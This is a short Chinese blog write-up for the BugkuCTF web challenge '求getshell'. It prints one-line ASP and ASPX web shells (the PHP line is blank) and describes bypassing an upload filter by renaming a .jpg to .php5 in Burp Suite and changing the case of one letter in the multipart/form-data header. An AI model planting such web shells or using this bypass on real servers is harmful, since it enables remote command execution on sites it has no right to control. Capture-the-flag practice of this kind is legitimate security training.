BugkuCTF之web题之求getshell

BugkuCTF之web题之求getshell

一进来发现:
BugkuCTF之web题之求getshell_第1张图片
maybe时绕过,那就用一句话木马吧!!
php的一句话是:
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
用文本写好一句话之后,把后缀改成.jpg上传
然后打开Burp Suite开始抓包:
BugkuCTF之web题之求getshell_第2张图片
把1.jpg修改成.php5,把multipart/form-data;任意一个字母变成大写。
BugkuCTF之web题之求getshell_第3张图片
得到flag!!

你可能感兴趣的:(CTF题,BUGKUCTF)